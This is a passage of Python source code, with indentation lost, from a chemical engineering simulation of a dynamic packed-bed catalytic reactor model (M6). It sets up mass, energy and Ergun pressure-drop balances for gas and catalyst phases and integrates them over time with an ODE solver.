# inlet superficial velocity [m/s]
SuGaVe0 = self.modelInput['feed']['superficial-velocity']
# reaction rate expression
reactionRateExpr = self.modelInput['reaction-rates']
# component molecular weight [g/mol]
MoWei = rmtUtil.extractCompData(self.internalData, "MW")
# external heat
ExHe = self.modelInput['external-heat']
# gas mixture viscosity [Pa.s]
GaMiVi = self.modelInput['feed']['mixture-viscosity']
# REVIEW
# domain length
DoLe = 1
# finite difference points in the z direction
zNo = solverSetting['S2']['zNo']
# length list
dataXs = np.linspace(0, ReLe, zNo)
# element size - dz [m]
dz = ReLe/(zNo-1)
# orthogonal collocation points in the r direction
rNo = solverSetting['S2']['rNo']
# var no (Ci,T)
varNo = compNo + 1
# concentration var no
varNoCon = compNo*zNo
# temperature var no
varNoTemp = 1*zNo
# concentration in solid phase
varNoConInSolidBlock = rNo*compNo
# total number
varNoConInSolid = varNoConInSolidBlock*zNo
# total var no along the reactor length (in gas phase)
varNoT = varNo*zNo
# number of layers
# concentration layer for each component C[m,j,i]
# m: layer, j: row (rNo), i: column (zNo)
# number of layers
noLayer = compNo + 1
# var no in each layer
varNoLayer = zNo*(rNo+1)
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = noLayer*varNoLayer
# concentration var number
varNoCon = compNo*varNoLayer
# number of var rows [j]
varNoRows = rNo + 1
# number of var columns [i]
varNoColumns = zNo
# initial values at t = 0 and z >> 0
IVMatrixShape = (noLayer, varNoRows, varNoColumns)
IV2D = np.zeros(IVMatrixShape)
# initialize IV2D
# -> concentration [kmol/m^3]
for m in range(noLayer - 1):
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
IV2D[m][j][i] = SpCoi0[m]
else:
# solid phase
IV2D[m][j][i] = SpCoi0[m]
# temperature
for i in range(varNoColumns):
for j in range(varNoRows):
# separate phase
if j == 0:
# gas phase
IV2D[noLayer - 1][j][i] = T
else:
# solid phase
IV2D[noLayer - 1][j][i] = T
# flatten IV
IV = IV2D.flatten()
# print(f"IV: {IV}")
# parameters
# component data
reactionListSorted = self.reactionListSorted
# reaction coefficient
reactionStochCoeff = self.reactionStochCoeffList
# standard heat of reaction at 25C [kJ/kmol]
StHeRe25 = np.array(
list(map(calStandardEnthalpyOfReaction, reactionList)))
# FIXME
# solver setting
# orthogonal collocation method
OrCoClassSet = OrCoClass()
OrCoClassSetRes = OrCoClassSet.buildMatrix()
# fun parameters
FunParam = {
"compList": compList,
"const": {
"CrSeAr": CrSeAr,
"MoWei": MoWei,
"StHeRe25": StHeRe25,
"GaMiVi": GaMiVi,
"varNo": varNo,
"varNoT": varNoT,
"reactionListNo": reactionListNo,
},
"ReSpec": ReSpec,
"ExHe": ExHe,
"constBC1": {
"VoFlRa0": VoFlRa0,
"SpCoi0": SpCoi0,
"SpCo0": SpCo0,
"P0": P,
"T0": T,
"SuGaVe0": SuGaVe0
},
"meshSetting": {
"noLayer": noLayer,
"varNoLayer": varNoLayer,
"varNoLayerT": varNoLayerT,
"varNoRows": varNoRows,
"varNoColumns": varNoColumns,
"rNo": rNo,
"zNo": zNo,
"dz": dz
},
"solverSetting": {
"OrCoClassSetRes": OrCoClassSetRes
},
"reactionRateExpr": reactionRateExpr
}
# time span
tNo = solverSetting['S2']['tNo']
opTSpan = np.linspace(0, opT, tNo + 1)
# save data
timesNo = solverSetting['S2']['timesNo']
# result
dataPack = []
# build data list
# over time
dataPacktime = np.zeros((varNo, tNo, zNo))
#
# solver selection
# BDF, Radau, LSODA
solverIVP = "LSODA" if solverIVPSet == 'default' else solverIVPSet
# time loop
for i in range(tNo):
# set time span
t = np.array([opTSpan[i], opTSpan[i+1]])
times = np.linspace(t[0], t[1], timesNo)
# ode call
# method [1]: LSODA, [2]: BDF, [3]: Radau
sol = solve_ivp(PackedBedReactorClass.modelEquationM6,
t, IV, method=solverIVP, t_eval=times, args=(reactionListSorted, reactionStochCoeff, FunParam))
# ode result
successStatus = sol.success
# check
if successStatus is False:
raise
# time interval
dataTime = sol.t
# all results
# components, temperature layers
dataYs = sol.y
# std format
dataYs_Reshaped = np.reshape(
dataYs[:, -1], (noLayer, varNoRows, varNoColumns))
# component concentration [kmol/m^3]
# Ci and Cs
# dataYs1 = dataYs[0:varNoCon, -1]
# 3d matrix
# dataYs1_Reshaped = np.reshape(
# dataYs1, (compNo, varNoRows, varNoColumns))
dataYs1_Reshaped = dataYs_Reshaped[:-1]
# gas phase
dataYs1GasPhase = dataYs1_Reshaped[:, 0, :]
# solid phase
dataYs1SolidPhase = dataYs1_Reshaped[:, 1:, :]
# REVIEW
# convert concentration to mole fraction
dataYs1_Ctot = np.sum(dataYs1GasPhase, axis=0)
dataYs1_MoFri = dataYs1GasPhase/dataYs1_Ctot
# temperature - 2d matrix
# dataYs2 = np.array([dataYs[varNoCon:varNoLayerT, -1]])
# 2d matrix
# dataYs2_Reshaped = np.reshape(
# dataYs2, (1, varNoRows, varNoColumns))
dataYs2_Reshaped = dataYs_Reshaped[indexTemp]
# gas phase
dataYs2GasPhase = dataYs2_Reshaped[0, :].reshape((1, zNo))
# solid phase
dataYs2SolidPhase = dataYs2_Reshaped[1:, :]
# combine
_dataYs = np.concatenate(
(dataYs1_MoFri, dataYs2GasPhase), axis=0)
# save data
dataPack.append({
"successStatus": successStatus,
"dataTime": dataTime[-1],
"dataYCon": dataYs1GasPhase,
"dataYTemp": dataYs2GasPhase,
"dataYs": _dataYs,
"dataYCons": dataYs1SolidPhase,
"dataYTemps": dataYs2SolidPhase,
})
for m in range(varNo):
# var list
dataPacktime[m][i, :] = dataPack[i]['dataYs'][m, :]
# update initial values [IV]
IV = dataYs[:, -1]
# NOTE
# end of computation
end = timer()
elapsed = roundNum(end - start)
# NOTE
# steady-state result
# txt
# ssModelingResult = np.loadtxt('ssModeling.txt', dtype=np.float64)
# binary
ssModelingResult = np.load('ResM1.npy')
# ssdataXs = np.linspace(0, ReLe, zNo)
ssXYList = pltc.plots2DSetXYList(dataXs, ssModelingResult)
ssdataList = pltc.plots2DSetDataList(ssXYList, labelList)
# datalists
ssdataLists = [ssdataList[0:compNo],
ssdataList[indexTemp]]
# subplot result
# pltc.plots2DSub(ssdataLists, "Reactor Length (m)",
# "Concentration (mol/m^3)", "1D Plug-Flow Reactor")
# plot info
plotTitle = f"Dynamic Modeling for opT: {opT} with zNo: {zNo}, tNo: {tNo} within {elapsed} seconds"
# REVIEW
# display result at specific time
for i in range(tNo):
# var list
_dataYs = dataPack[i]['dataYs']
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataYs)
# -> add label
dataList = pltc.plots2DSetDataList(XYList, labelList)
# datalists
dataLists = [dataList[0:compNo],
dataList[indexTemp]]
if i == tNo-1:
# subplot result
pltc.plots2DSub(dataLists, "Reactor Length (m)",
"Concentration (mol/m^3)", plotTitle, ssdataLists)
# REVIEW
# display result within time span
_dataListsLoop = []
_labelNameTime = []
for i in range(varNo):
# var list
_dataPacktime = dataPacktime[i]
# plot setting: build (x,y) series
XYList = pltc.plots2DSetXYList(dataXs, _dataPacktime)
# -> add label
# build label
for t in range(tNo):
_name = labelList[i] + " at t=" + str(opTSpan[t+1])
_labelNameTime.append(_name)
dataList = pltc.plots2DSetDataList(XYList, _labelNameTime)
# datalists
_dataListsLoop.append(dataList[0:tNo])
# reset
_labelNameTime = []
# select items
# indices = [0, 2, -1]
# selected_elements = [_dataListsLoop[index] for index in indices]
# select datalist
_dataListsSelected = selectFromListByIndex([1, -1], _dataListsLoop)
# subplot result
# pltc.plots2DSub(_dataListsSelected, "Reactor Length (m)",
# "Concentration (mol/m^3)", "Dynamic Modeling of 1D Plug-Flow Reactor")
# return
res = {
"XYList": XYList,
"dataList": dataList
}
return res
def modelEquationM6(t, y, reactionListSorted, reactionStochCoeff, FunParam):
"""
M6 model [dynamic modeling]
mass, energy, and momentum balance equations
modelParameters:
reactionListSorted: reactant/product and coefficient lists
reactionStochCoeff: reaction stoichiometric coefficient
FunParam:
compList: component list
const
CrSeAr: reactor cross sectional area [m^2]
MoWei: component molecular weight [g/mol]
StHeRe25: standard heat of reaction at 25C [kJ/kmol] | [J/mol]
GaMiVi: gas mixture viscosity [Pa.s]
varNo: number of variables (Ci, CT, T)
varNoT: number of variables in the domain (zNo*varNoT)
reactionListNo: reaction list number
ReSpec: reactor spec
ExHe: exchange heat spec
OvHeTrCo: overall heat transfer coefficient [J/m^2.s.K]
EfHeTrAr: effective heat transfer area [m^2]
MeTe: medium temperature [K]
constBC1:
VoFlRa0: inlet volumetric flowrate [m^3/s],
SpCoi0: species concentration [kmol/m^3],
SpCo0: total concentration [kmol/m^3]
P0: inlet pressure [Pa]
T0: inlet temperature [K]
meshSetting:
noLayer: number of layers
varNoLayer: var no in each layer
varNoLayerT: total number of vars (Ci,T,Cci,Tci)
varNoRows: number of var rows [j]
varNoColumns: number of var columns [i]
zNo: number of finite difference in z direction
rNo: number of orthogonal collocation points in r direction
dz: differential length [m]
solverSetting:
OrCoClassSetRes: constants of OC methods
reactionRateExpr: reaction rate expressions
"""
# fun params
# component symbol list
comList = FunParam['compList']
# const ->
const = FunParam['const']
# cross-sectional area [m^2]
CrSeAr = const['CrSeAr']
# component molecular weight [g/mol]
MoWei = const['MoWei']
# standard heat of reaction at 25C [kJ/kmol] | [J/mol]
StHeRe25 = const['StHeRe25']
# gas viscosity [Pa.s]
GaMiVi = const['GaMiVi']
# reaction no
reactionListNo = const['reactionListNo']
# reactor spec ->
ReSpec = FunParam['ReSpec']
# particle diameter [m]
PaDi = ReSpec['PaDi']
# bed void fraction - porosity
BeVoFr = ReSpec['BeVoFr']
# bulk density (catalyst bed density)
CaBeDe = ReSpec['CaBeDe']
# catalyst density [kgcat/m^3 of particle]
CaDe = ReSpec['CaDe']
# catalyst heat capacity at constant pressure [kJ/kg.K]
CaSpHeCa = ReSpec['CaSpHeCa']
# catalyst porosity
CaPo = ReSpec['CaPo']
# catalyst tortuosity
CaTo = ReSpec['CaTo']
# catalyst thermal conductivity [J/K.m.s]
CaThCo = ReSpec['CaThCo']
# exchange heat spec ->
ExHe = FunParam['ExHe']
# var no. (concentration, temperature)
varNo = const['varNo']
# var no. in the domain
varNoT = const['varNoT']
# boundary conditions constants
constBC1 = FunParam['constBC1']
## inlet values ##
# inlet volumetric flowrate at T,P [m^3/s]
VoFlRa0 = constBC1['VoFlRa0']
# inlet species concentration [kmol/m^3]
SpCoi0 = constBC1['SpCoi0']
# inlet total concentration [kmol/m^3]
SpCo0 = constBC1['SpCo0']
# inlet pressure [Pa]
P0 = constBC1['P0']
# inlet temperature [K]
T0 = constBC1['T0']
# mesh setting
meshSetting = FunParam['meshSetting']
# number of layers
noLayer = meshSetting['noLayer']
# var no in each layer
varNoLayer = meshSetting['varNoLayer']
# total number of vars (Ci,T,Cci,Tci)
varNoLayerT = meshSetting['varNoLayerT']
# number of var rows [j]
varNoRows = meshSetting['varNoRows']
# number of var columns [i]
varNoColumns = meshSetting['varNoColumns']
# rNo
rNo = meshSetting['rNo']
# zNo
zNo = meshSetting['zNo']
# dz [m]
dz = meshSetting['dz']
# solver setting
solverSetting = FunParam['solverSetting']
# number of collocation points
ocN = solverSetting['OrCoClassSetRes']['N']
ocXc = solverSetting['OrCoClassSetRes']['Xc']
ocA = solverSetting['OrCoClassSetRes']['A']
ocB = solverSetting['OrCoClassSetRes']['B']
ocQ = solverSetting['OrCoClassSetRes']['Q']
# init OrCoCatParticle
OrCoCatParticleClassSet = OrCoCatParticleClass(
ocXc, ocN, ocQ, ocA, ocB, varNo)
# reaction rate expressions
reactionRateExpr = FunParam['reactionRateExpr']
# using equation
varisSet = reactionRateExpr['VARS']
ratesSet = reactionRateExpr['RATES']
# components no
# y: component molar flowrate, total molar flux, temperature, pressure
compNo = len(comList)
indexT = compNo
indexP = indexT + 1
indexV = indexP + 1
# calculate
# particle radius
PaRa = PaDi/2
# specific surface area exposed to the free fluid [m^2/m^3]
SpSuAr = (3/PaRa)*(1 - BeVoFr)
# molar flowrate [kmol/s]
MoFlRa0 = SpCo0*VoFlRa0
# superficial gas velocity [m/s]
InGaVe0 = VoFlRa0/(CrSeAr*BeVoFr)
# interstitial gas velocity [m/s]
SuGaVe0 = InGaVe0*BeVoFr
# interstitial gas velocity [m/s]
InGaVeList_z = np.zeros(zNo)
InGaVeList_z[0] = InGaVe0
# total molar flux [kmol/m^2.s]
MoFl_z = np.zeros(zNo)
MoFl_z[0] = MoFlRa0
# reaction rate in the solid phase
Ri_z = np.zeros((zNo, reactionListNo))
Ri_zr = np.zeros((zNo, rNo, reactionListNo))
Ri_r = np.zeros((rNo, reactionListNo))
# reaction rate
# ri = np.zeros(compNo) # deprecate
# ri0 = np.zeros(compNo) # deprecate
# solid phase
ri_r = np.zeros((rNo, compNo))
# overall reaction
OvR = np.zeros(rNo)
# overall enthalpy
OvHeReT = np.zeros(rNo)
# heat capacity at constant pressure
SoCpMeanMix = np.zeros(rNo)
# pressure [Pa]
P_z = np.zeros(zNo + 1)
P_z[0] = P0
# superficial gas velocity [m/s]
v_z = np.zeros(zNo + 1)
v_z[0] = SuGaVe0
# NOTE
# distribute y[i] value through the reactor length
# reshape
yLoop = np.reshape(y, (noLayer, varNoRows, varNoColumns))
# all species concentration in gas & solid phase
SpCo_mz = np.zeros((noLayer - 1, varNoRows, varNoColumns))
# all species concentration in gas phase [kmol/m^3]
SpCoi_z = np.zeros((compNo, zNo))
# all species concentration in solid phase (catalyst) [kmol/m^3]
SpCosi_mzr = np.zeros((compNo, rNo, zNo))
# layer
for m in range(compNo):
# -> concentration [mol/m^3]
_SpCoi = yLoop[m]
SpCo_mz[m] = _SpCoi
# concentration in the gas phase [kmol/m^3]
for m in range(compNo):
for j in range(varNoRows):
if j == 0:
# gas phase
SpCoi_z[m, :] = SpCo_mz[m, j, :]
else:
# solid phase
SpCosi_mzr[m, j-1, :] = SpCo_mz[m, j, :]
# species concentration in gas phase [kmol/m^3]
CoSpi = np.zeros(compNo)
# total concentration [kmol/m^3]
CoSp = 0
# species concentration in solid phase (catalyst) [kmol/m^3]
# shape
CosSpiMatShape = (rNo, compNo)
CosSpi_r = np.zeros(CosSpiMatShape)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.zeros(rNo)
# flux
MoFli_z = np.zeros(compNo)
# NOTE
# temperature [K]
T_mz = np.zeros((varNoRows, varNoColumns))
T_mz = yLoop[noLayer - 1]
# temperature in the gas phase
T_z = np.zeros(zNo)
T_z = T_mz[0, :]
# temperature in solid phase
Ts_z = np.zeros((rNo, zNo))
Ts_z = T_mz[1:]
# temperature in the solid phase
Ts_r = np.zeros(rNo)
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
dxdtMat = np.zeros((noLayer, varNoRows, varNoColumns))
# NOTE
# FIXME
# define ode equations for each finite difference [zNo]
for z in range(varNoColumns):
## block ##
# concentration species in the gas phase [kmol/m^3]
for i in range(compNo):
_SpCoi_z = SpCoi_z[i][z]
CoSpi[i] = max(_SpCoi_z, CONST.EPS_CONST)
# total concentration [kmol/m^3]
CoSp = np.sum(CoSpi)
# FIXME
# concentration species in the solid phase [kmol/m^3]
# display concentration list in each oc point (rNo)
for i in range(compNo):
for r in range(rNo):
_CosSpi_z = SpCosi_mzr[i][r][z]
CosSpi_r[r][i] = max(_CosSpi_z, CONST.EPS_CONST)
# total concentration in the solid phase [kmol/m^3]
CosSp_r = np.sum(CosSpi_r, axis=1).reshape((rNo, 1))
# concentration in the outer surface of the catalyst [kmol/m^3]
CosSpi_cat = CosSpi_r[0]
# temperature [K]
T = T_z[z]
# temperature in the solid phase (for each point)
# Ts[3], Ts[2], Ts[1], Ts[0]
Ts_r = Ts_z[:, z]
# pressure [Pa]
P = P_z[z]
# velocity
v = v_z[z]
## calculate ##
# mole fraction in the gas phase
MoFri = np.array(
rmtUtil.moleFractionFromConcentrationSpecies(CoSpi))
# mole fraction in the solid phase
# MoFrsi_r0 = CosSpi_r/CosSp_r
MoFrsi_r = rmtUtil.moleFractionFromConcentrationSpeciesMat(
CosSpi_r)
# TODO
# dv/dz
# gas velocity based on interstitial velocity [m/s]
# InGaVe = rmtUtil.calGaVeFromEOS(InGaVe0, SpCo0, CoSp, P0, P)
# superficial gas velocity [m/s]
# SuGaVe = InGaVe*BeVoFr
# from ode eq. dv/dz
SuGaVe = v
# total flowrate [kmol/s]
# [kmol/m^3]*[m/s]*[m^2]
MoFlRa = CoSp*SuGaVe*CrSeAr
# molar flowrate list [kmol/s]
MoFlRai = MoFlRa*MoFri
# convert to [mol/s]
MoFlRai_Con1 = 1000*MoFlRai
# molar flux [kmol/m^2.s]
MoFl = MoFlRa/CrSeAr
# volumetric flowrate [m^3/s]
VoFlRai = calVolumetricFlowrateIG(P, T, MoFlRai_Con1)
# mixture molecular weight [kg/mol]
MiMoWe = rmtUtil.mixtureMolecularWeight(MoFri, MoWei, "kg/mol")
# gas density [kg/m^3]
GaDe = calDensityIG(MiMoWe, CoSp*1000)
GaDeEOS = calDensityIGFromEOS(P, T, MiMoWe)
# NOTE
# ergun equation
ergA = 150*GaMiVi*SuGaVe/(PaDi**2)
ergB = ((1-BeVoFr)**2)/(BeVoFr**3)
ergC = 1.75*GaDe*(SuGaVe**2)/PaDi
ergD = (1-BeVoFr)/(BeVoFr**3)
RHS_ergun = -1*(ergA*ergB + ergC*ergD)
# momentum balance (ergun equation)
dxdt_P = RHS_ergun
# dxdt.append(dxdt_P)
P_z[z+1] = dxdt_P*dz + P_z[z]
# REVIEW
# FIXME
# viscosity in the gas phase [Pa.s] | [kg/m.s]
GaVi = np.zeros(compNo) # f(T);
# mixture viscosity in the gas phase [Pa.s] | [kg/m.s]
GaViMix = 2.5e-5 # f(yi,GaVi,MWs);
# kinematic viscosity in the gas phase [m^2/s]
GaKiViMix = GaViMix/GaDe
# REVIEW
# FIXME
# add loop for each r point/constant
# catalyst thermal conductivity [J/s.m.K]
# CaThCo
# membrane wall thermal conductivity [J/s.m.K]
MeThCo = 1
# thermal conductivity - gas phase [J/s.m.K]
# GaThCoi = np.zeros(compNo) # f(T);
GaThCoi = np.array([0.278863993072407, 0.0353728593093126, 0.0378701882504170,
0.0397024608654616, 0.0412093811132403, 0.0457183034548015])
# mixture thermal conductivity - gas phase [J/s.m.K]
# convert
GaThCoMix = 0.125
# thermal conductivity - solid phase [J/s.m.K]
# assume the same as gas phase
# SoThCoi = np.zeros(compNo) # f(T);
SoThCoi = GaThCoi
# mixture thermal conductivity - solid phase [J/s.m.K]
SoThCoMix = 0.125
# effective thermal conductivity - gas phase [J/s.m.K]
# GaThCoEff = BeVoFr*GaThCoMix + (1 - BeVoFr)*CaThCo
GaThCoEff = BeVoFr*GaThCoMix
# effective thermal conductivity - solid phase [J/s.m.K]
# SoThCoEff0 = CaPo*SoThCoMix + (1 - CaPo)*CaThCo
SoThCoEff = CaThCo*((1 - CaPo)/CaTo)
# REVIEW
# diffusivity coefficient - gas phase [m^2/s]
# GaDii = np.zeros(compNo) # gas_diffusivity_binary(yi,T,P0);
GaDii = np.array([6.61512999110972e-06, 2.12995183554984e-06, 1.39108654241678e-06,
2.20809430865725e-06, 9.64429037148681e-07, 8.74374373632434e-07])
# effective diffusivity - solid phase [m2/s]
SoDiiEff = (CaPo/CaTo)*GaDii
# REVIEW
### dimensionless numbers ###
# Re Number
ReNu = calReNoEq1(GaDe, SuGaVe, PaDi, GaViMix)
# Sc Number
ScNu = calScNoEq1(GaDe, GaViMix, GaDii)
# Sh Number (choose method)
ShNu = calShNoEq1(ScNu, ReNu, CONST_EQ_Sh['Frossling'])
# REVIEW
# mass transfer coefficient - gas/solid [m/s]
MaTrCo = calMassTransferCoefficientEq1(ShNu, GaDii, PaDi)
# NOTE
## kinetics ##
# net reaction rate expression [kmol/m^3.s]
# rf[kmol/kgcat.s]*CaDe[kgcat/m^3]
for r in range(rNo):
#
# r0 = np.array(PackedBedReactorClass.modelReactions(
# P_z[z], Ts_r[r], MoFrsi_r[r], CaDe))
# loop
loopVars0 = (Ts_r[r], P_z[z], MoFrsi_r[r], CosSpi_r[r])
# component formation rate [mol/m^3.s]
# check unit
r0 = np.array(reactionRateExe(
loopVars0, varisSet, ratesSet))
# loop
Ri_zr[z, r, :] = r0
Ri_r[r, :] = r0
# reset
_riLoop = 0
# REVIEW
# component formation rate [kmol/m^3.s]
# ri = np.zeros(compNo)
# for k in range(compNo):
# # reset
# _riLoop = 0
# # number of reactions
# for m in range(len(reactionStochCoeff)):
# # number of components in each reaction
# for n in range(len(reactionStochCoeff[m])):
# # check component id
# if comList[k] == reactionStochCoeff[m][n][0]:
# _riLoop += reactionStochCoeff[m][n][1] * \
# Ri_r[r][m]
# ri_r0[r][k] = _riLoop
ri_r[r] = componentFormationRate(
compNo, comList, reactionStochCoeff, Ri_r[r])
# overall formation rate [kmol/m^3.s]
OvR[r] = np.sum(ri_r[r])
# NOTE
### enthalpy calculation ###
# gas phase
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
GaCpMeanList = calMeanHeatCapacityAtConstantPressure(comList, T)
# Cp mixture
GaCpMeanMix = calMixtureHeatCapacityAtConstantPressure(
MoFri, GaCpMeanList)
# effective heat capacity - gas phase [kJ/kmol.K] | [J/mol.K]
GaCpMeanMixEff = GaCpMeanMix*BeVoFr
# FIXME
# effective heat capacity - solid phase [kJ/m^3.K]
SoCpMeanMixEff = CoSp*GaCpMeanMix*CaPo + (1-CaPo)*CaDe*CaSpHeCa
# solid phase
for r in range(rNo):
# heat capacity at constant pressure of mixture Cp [kJ/kmol.K] | [J/mol.K]
# Cp mean list
SoCpMeanList = calMeanHeatCapacityAtConstantPressure(
comList, Ts_r[r])
# Cp mixture
SoCpMeanMix[r] = calMixtureHeatCapacityAtConstantPressure(
MoFrsi_r[r], SoCpMeanList)
# enthalpy change from Tref to T [kJ/kmol] | [J/mol]
# enthalpy change
EnChList = np.array(
calEnthalpyChangeOfReaction(reactionListSorted, Ts_r[r]))
# heat of reaction at T [kJ/kmol] | [J/mol]
HeReT = np.array(EnChList + StHeRe25)
# overall heat of reaction [kJ/m^3.s]
# exothermic reaction (negative sign)
# endothermic sign (positive sign)
OvHeReT[r] = np.dot(Ri_r[r, :], HeReT)
# REVIEW
# Prandtl Number
# MW kg/mol -> g/mol
# MiMoWe_Conv = 1000*MiMoWe
PrNu = calPrNoEq1(
GaCpMeanMix, GaViMix, GaThCoMix, MiMoWe)
# Nu number
NuNu = calNuNoEq1(PrNu, ReNu)
# heat transfer coefficient - gas/solid [J/m^2.s.K]
HeTrCo = calHeatTransferCoefficientEq1(NuNu, GaThCoMix, PaDi)
# REVIEW
# heat transfer coefficient - medium side [J/m2.s.K]
# hs = heat_transfer_coefficient_shell(T,Tv,Pv,Pa);
# overall heat transfer coefficient [J/m2.s.K]
# U = overall_heat_transfer_coefficient(hfs,kwall,do,di,L);
# heat transfer coefficient - permeate side [J/m2.s.K]
# NOTE
# cooling temperature [K]
Tm = ExHe['MeTe']
# overall heat transfer coefficient [J/s.m2.K]
U = ExHe['OvHeTrCo']
# heat transfer area over volume [m^2/m^3]
a = ExHe['EfHeTrAr']
# heat transfer parameter [W/m^3.K] | [J/s.m^3.K]
Ua = U*a
# external heat [kJ/m^3.s]
# if Tm == 0:
# # adiabatic
# Qm0 = 0
# else:
# # heat added/removed from the reactor
# # Tm > T: heat is added (positive sign)
# # T > Tm: heat removed (negative sign)
# Qm0 = (Ua*(Tm - T))*1e-3
Qm = rmtUtil.calHeatExchangeBetweenReactorMedium(
Tm, T, U, a, 'kJ/m^3.s')
# NOTE
# mass transfer between
for i in range(compNo):
### gas phase ###
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# concentration in the catalyst surface [kmol/m^3]
# CosSpi_cat
# inward flux [kmol/m^2.s]
MoFli_z[i] = MaTrCo[i]*(Ci_c - CosSpi_cat[i])
# total mass transfer between gas and solid phases [kmol/m^3]
ToMaTrBeGaSo_z = np.sum(MoFli_z)*SpSuAr
# NOTE
# velocity from global concentration
# check BC
# if z == 0:
# # BC1
# T_b = T0
# else:
# # interior nodes
# T_b = T_z[z - 1]
# check BC
if z == 0:
# BC1
constT_BC1 = (GaThCoEff)/(MoFl*GaCpMeanMix/1000)
# next node
T_f = T_z[z+1]
# previous node
T_b = (T0*dz + constT_BC1*T_f)/(dz + constT_BC1)
elif z == zNo - 1:
# BC2
# previous node
T_b = T_z[z - 1]
# next node
T_f = 0
else:
# interior nodes
T_b = T_z[z-1]
# next node
T_f = T_z[z+1]
dxdt_v_T = (T_z[z] - T_b)/dz
# CoSp x 1000
# OvR x 1000
dxdt_v = (1/(CoSp*1000))*((-SuGaVe/CONST.R_CONST) *
((1/T)*dxdt_P - (P/T**2)*dxdt_v_T) - ToMaTrBeGaSo_z*1000)
# velocity [forward value] is updated
# backward value of temp is taken
# dT/dt will update the old value
v_z[z+1] = dxdt_v*dz + v_z[z]
# NOTE
# diff/dt
# dxdt = []
# matrix
# dxdtMat = np.zeros((varNo, zNo))
# loop vars
const_F1 = 1/BeVoFr
# [kmol/m^2.s][kJ/kmol.K]=[kJ/m^2.s.K]
const_T1 = MoFl*GaCpMeanMix
# [kmol/m^3][kJ/kmol.K]=[kJ/m^3.K]
const_T2 = 1/(CoSp*GaCpMeanMixEff)
# catalyst
const_Cs1 = 1/(CaPo*(PaRa**2))
const_Ts1 = 1/(SoCpMeanMixEff*(PaRa**2))
# bulk temperature [K]
T_c = T_z[z]
# REVIEW
# gas-solid interface BC
# concentration [m/s]*[m^2/s]=[1/m]
betaC = PaRa*(MaTrCo/SoDiiEff)
# temperature
betaT = -1*((HeTrCo*PaRa)/SoThCoEff)
# universal index [j,i]
# UISet = z*(rNo + 1)
# NOTE
# concentration [mol/m^3]
for i in range(compNo):
### gas phase ###
# mass balance (forward difference)
# concentration [kmol/m^3]
# central
Ci_c = SpCoi_z[i][z]
# check BC
if z == 0:
# BC1
constC_BC1 = GaDii[i]*BeVoFr/v_z[z]
# forward
Ci_f = SpCoi_z[i][z+1]
Ci_b = (1/(constC_BC1 + dz)) * \
(SpCoi0[i]*dz + constC_BC1*(Ci_f))
elif z == zNo - 1:
# BC2
# forward difference
Ci_f = 0
# previous node
Ci_b = max(SpCoi_z[i][z - 1], CONST.EPS_CONST)
else:
# forward
Ci_f = SpCoi_z[i][z+1]
# interior nodes
Ci_b = max(SpCoi_z[i][z - 1], CONST.EPS_CONST)
# cal differentiate
# backward difference
dCdz = (Ci_c - Ci_b)/dz
# central difference for dispersion
d2Cdz2 = (Ci_b - 2*Ci_c + Ci_f)/(dz**2)
# dispersion term [kmol/m^3.s]
_dispersionFluxC = GaDii[i]*BeVoFr*d2Cdz2
# concentration in the catalyst surface [kmol/m^3]
# CosSpi_cat
# inward flux [kmol/m^2.s]
# MoFli_z[i] = MaTrCo[i]*(Ci_c - CosSpi_cat[i])
# mass balance
# convective, dispersion, inward flux
dxdt_F = const_F1 * \
(-v_z[z]*dCdz - Ci_c*dxdt_v +
_dispersionFluxC - MoFli_z[i]*SpSuAr)
dxdtMat[i][0][z] = dxdt_F
### solid phase ###
# bulk concentration [kmol/m^3]
# Ci_c
# bulk temperature [K]
# T_c
# species concentration at different points of particle radius [rNo]
# [Cs[3], Cs[2], Cs[1], Cs[0]]
_Cs_r = CosSpi_r[:, i].flatten()
# updated concentration gas-solid interface
# shape(rNo,1)
_Cs_r_Updated = OrCoCatParticleClassSet.CalUpdateYnSolidGasInterface(
_Cs_r, Ci_c, betaC[i])
# dC/dt list
dCsdti = OrCoCatParticleClassSet.buildOrCoMatrix(
_Cs_r_Updated, SoDiiEff[i], (PaRa**2)*ri_r[:, i])
for r in range(rNo):
# update
dxdtMat[i][r+1][z] = const_Cs1*dCsdti[r]
# NOTE
# energy balance (temperature) [K]
# temp [K]
# T_c = T_z[z]
# temperature at different points of particle radius [rNo]
# Ts[3], Ts[2], Ts[1], Ts[0]
_Ts_r = Ts_r.flatten()
# check BC
if z == 0:
# BC1
constT_BC1 = (GaThCoEff)/(MoFl*GaCpMeanMix*1000)
# next node
T_f = T_z[z+1]
# previous node
T_b = (T0*dz + constT_BC1*T_f)/(dz + constT_BC1)
elif z == zNo - 1:
# BC2
# previous node
T_b = T_z[z - 1]
# next node
T_f = 0
else:
# interior nodes
T_b = T_z[z - 1]
# next node
T_f = T_z[z+1]
# cal differentiate
# backward difference
dTdz = (T_c - T_b)/dz
# central difference
d2Tdz2 = (T_b - 2*T_c + T_f)/(dz**2)
# FIXME
# dispersion flux [kJ/m^3.s]
_dispersionFluxT = (GaThCoEff*d2Tdz2)*1e-3*0
# temperature in the catalyst surface [K]
# Ts_cat
# outward flux [kJ/m^2.s]
InFlT = HeTrCo*(_Ts_r[0] - T_c)*1e-3
# total heat transfer between gas and solid [kJ/m^3.s]
ToHeTrBeGaSo_z = InFlT*SpSuAr
# convective flux, diffusive flux, enthalpy of reaction, cooling heat
dxdt_T = const_T2 * \
(-const_T1*dTdz + _dispersionFluxT + ToHeTrBeGaSo_z + Qm)
dxdtMat[indexT][0][z] = dxdt_T
### solid phase ###
# _Ts_r
# T[n], T[n-1], ..., T[0]
# updated temperature gas--solid interface
_Ts_r_Updated = OrCoCatParticleClassSet.CalUpdateYnSolidGasInterface(
_Ts_r, T_c, betaT)
# dC/dt list
# convert
# [J/s.m.K] => [kJ/s.m.K]
SoThCoEff_Conv = SoThCoEff/1000
# OvHeReT [kJ/m^3.s]
OvHeReT_Conv = -1*OvHeReT
dTsdti = OrCoCatParticleClassSet.buildOrCoMatrix(
_Ts_r_Updated, SoThCoEff_Conv, (PaRa**2)*OvHeReT_Conv)
for r in range(rNo):
# update
